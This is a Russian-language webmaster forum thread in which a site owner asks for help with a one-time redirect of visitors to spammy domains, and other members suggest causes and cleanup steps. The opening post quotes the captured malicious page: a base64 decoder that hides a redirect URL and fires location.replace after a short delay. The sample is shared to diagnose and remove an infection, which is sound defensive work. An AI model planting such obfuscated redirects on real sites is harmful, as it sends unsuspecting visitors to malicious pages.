Неуловимый скрипт

S0
На сайте с 30.06.2006
Offline
55
799

на моем сайте нарисовалась проблема. нужен совет, куда копать.

Проблема такова:

Открываю сайт, кликаю по любой ссылке - идет редирект на произвольную страницу типа

http:__20kq99kivsul6wm9echf1xz.ayakkabimodellerim.org/index.php?u=cWVidGRxPXZ

http:__jofbqm4tabmtb4ajvk419hi.beton-storten.be/index.php?t=anBiZm=

http:__xu1ehutnptyusapclw5g7nj.betonprijzen.be/index.php?x=d2dzaWlxeXQ9aG=

http:__na2i467qhp2wx1d2th7dfli.beton.infoportal.be/index.php?q=Z3JtleT1CMUJEMU

не могу найти причину.

скрипты в браузере отключал, код страницы проверял, вырезал последовательно все скрипты, - ничего не нашел.

во время редиректа удалось отловить такой код:

<html> <head> <title>index</title> </head> <body> <script>


function b64dc(str) {
var b64c = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefg'+'hijklmnopqrstuvwxyz0123456789+/=';
var b64d = '', chr1, chr2, chr3, enc1, enc2, enc3, enc4;
str = str.replace(/[^a-z0-9+/=]/gi, '');
for (var i=0; i<str.length;) {
enc1 = b64c.indexOf(str.charAt(i++));
enc2 = b64c.indexOf(str.charAt(i++));
enc3 = b64c.indexOf(str.charAt(i++));
enc4 = b64c.indexOf(str.charAt(i++));
chr1 = (enc1 << 2) | (enc2 >> 4);
chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
chr3 = ((enc3 & 3) << 6) | enc4;
b64d = b64d + String.fromCharCode(chr1);
if (enc3 < 64) { b64d += String.fromCharCode(chr2); }
if (enc4 < 64) { b64d += String.fromCharCode(chr3); }
}
return b64d;
};

var str = "aHR0cDovL2hwNXQ2bzcxYXc3NWYyd2V3eTZ0dXBwNDExNTRlMTg4OWY5NTViNGE1NDAyZmNlZjMxOGQ1NDUxLmJhY2tsaW5rZHVueWFzaS5jb20vaW5kZXgyLnBocA==";
setTimeout ( function() { location.replace( b64dc(str) ); }, 350);
</script></body></html>

Подскажите что делать

PS

1. редирект идет только со свежего айпи и только 1 раз! после этого сайт работает исправно.

2. проблема не в моем компе

Diversant
На сайте с 29.03.2006
Offline
329
#1

По вашей теме гуглится вот это http://blog.dynamoo.com/2013/09/speedpacket-cookiebomb-and-something.html

S0
На сайте с 30.06.2006
Offline
55
#2
Diversant:
По вашей теме гуглится вот это http://blog.dynamoo.com/2013/09/speedpacket-cookiebomb-and-something.html

блокировка указанных там айпи и доменов это полумеры. завтра появятся новые свеже-хакнутые.

мне бы свой сайт почистить от нечести

draff
На сайте с 30.03.2010
Offline
65
#3

Проверить айболитом, главную шаблона на предмет подключения скриптов.

Сайт на чем ?

Удалю вирус с сайта Джумла! (http://joomlaforum.ru/index.php/topic,254903.0.html)
S0
На сайте с 30.06.2006
Offline
55
#4
draff:
Проверить айболитом, главную шаблона на предмет подключения скриптов.
Сайт на чем ?

Сайт не на СМS. Cashcrusader софт.

Сайт с 2005 года работает, софт обновляется вовремя. так что отсюда проблемы не должно быть.

Я отключал поступенчато все скрипты, надеясь настичь виновника. Пробовал также плагин мозиллы носкрипт.

S
На сайте с 23.05.2011
Offline
29
#5

На моих сайтах joom.uz ... тоже вроде разного рода трояны проникли, как защититься от них, надоело без конца в бэкапы обращаться.

franklin90
На сайте с 01.06.2006
Offline
131
#6

Иногда бывает полезно проверить не сайт(ы), а сервер. Есть варианты, когда устанавливается дополнительный модуль к Apache, который вставляет на сайты вредоносный код. Причем, как правило, код этот не показывается root и админам.

C уважением Александр
K5
На сайте с 21.07.2010
Offline
209
#7

saidrustam, проблема в templates/joomuz/lib/js/mootools.js.php

и 3 фрейма левых

аська 45два48499два записки на работе (http://memoryhigh.ru) помогу с сайтом, удалю вирусы, настрою впс -> отзывы ТУТ (/ru/forum/836248) и ТАМ (http://www.maultalk.com/topic140187.html) !!!всегда проверяйте данные людей, которые сами пишут вам в аську или скайп!!!
S0
На сайте с 30.06.2006
Offline
55
#8

whistlestop-cafe.biz взгляните.

могу еще хостера попросить ковырнуть. там ребята хорошие

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий